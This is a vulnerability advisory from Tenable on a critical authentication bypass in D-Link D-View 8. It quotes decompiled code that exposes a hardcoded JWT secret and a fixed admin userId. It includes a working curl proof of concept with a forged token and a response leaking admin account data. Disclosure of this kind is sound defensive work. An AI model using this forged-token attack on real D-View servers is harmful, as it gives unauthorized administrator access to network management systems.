Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Authentication Bypass in D-Link D-View 8

Critical

Synopsis

A researcher at Tenable discovered an authentication bypass vulnerability in D-Link D-View 8 v2.0.1.28.

D-View 8 uses a static key (D-Link) to protect the JWT token used in user authentication:

// webApi-0.0.1-SNAPSHOT.jar!com.dlink.dview8.webapi.utils.TokenUtils

  public static String verifyToken(String token) {
    if (Utils.isEmpty(token))
      return null; 
    Algorithm algorithm = Algorithm.HMAC256("D-Link");
    JWTVerifier verifier = JWT.require(algorithm).build();
    DecodedJWT jwt = verifier.verify(token);
    return jwt.getClaim("userId").asString();
  }

D-View 8 supports login with an API key, but the supplied API key in the JWT token (accessToken) is not checked if there is no API key configured for the login user:

// webApi-0.0.1-SNAPSHOT.jar!com.dlink.dview8.webapi.base.shiro.WebApiRealm

      } else if (type == DViewConstant.LoginType.ApiKey) {
        String restApiKey = TokenUtils.getRestApiKey(accessToken);
        boolean isFindApiKeyToken = false;
        List<RestApiKey> apiKeys = this.restApiKeyDBService.queryRestApiKeyByUserId(userId, new String[] { "key", "status" });
        if (!Utils.isEmpty(apiKeys)) {
          for (RestApiKey apiKey : apiKeys) {
            if (restApiKey.equals(apiKey.getKey()) && apiKey.getStatus() != null && apiKey.getStatus().intValue() == 1)
              isFindApiKeyToken = true; 
          } 
          if (!isFindApiKeyToken) {
            log.error("REST API Key Token is invaild.");
            throw new UnknownAccountException("user.token.invalid");
          } 
        } 

Upon D-View 8 installation, there is no API key configured for the default user admin. In addition, the userId for the admin user appears to remain the same (59171d56-e6b4-4789-90ff-a7a27fd48548) across installations. With a known JWT secret key, an unauthenticated remote attacker can craft a valid JWT token and use the token to access protected APIs.

Proof of Concept:

curl -k -H 'Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI' 'https://<dview8-host>:17300/dview8/api/usersByLevel'

---- response ----

{
  "code" : 200,
  "value" : [ {
    "userId" : "59171d56-e6b4-4789-90ff-a7a27fd48548",
    "userName" : "admin",
    "passWord" : "JEspzb0swmH1ItPCNvMsVA==",
    "email" : " ",
    "description" : "",
    "status" : 1,
    "createTime" : 1569208381096,
    "updateTime" : 1569295082216,
    "address" : "",
    "type" : 1,
    "phone" : "",
    "nickname" : "Super Administrator",
    "logo" : "",
    "isReset" : true,
    "loginIp" : "<REDACTED>",
    "isVerifyToken" : true,
    "verifyTokenTime" : 15,
    "isEmailActivate" : false,
    "privilege" : [ {
      "id" : "728be557-1711-4f0c-98f5-2e23a1848fa3",
      "roleId" : "4c8396d1-439f-40a7-bf78-aabc1f207b4c",
      "name" : "MyOrg4",
      "children" : [ ]
    } ]
  } ],
  "success" : true
}

Solution

D-Link has fixed this issue in v2.0.2.89. Please reach out to D-Link for further information.

Disclosure Timeline

21 June 2023 - Tenable reports issue to D-Link
21 June 2023 - D-Link acknowledges
23 August 2023 - D-Link releases version 2.0.2.89
19 September 2023 - Advisory published

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2023-5074
Tenable Advisory ID: TRA-2023-32
CVSSv3 Base / Temporal Score:
9.8 / 9.1
CVSSv3 Vector:
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected Products:
D-Link D-View 8
Risk Factor:
Critical

Advisory Timeline

19 September 2023 - Advisory Published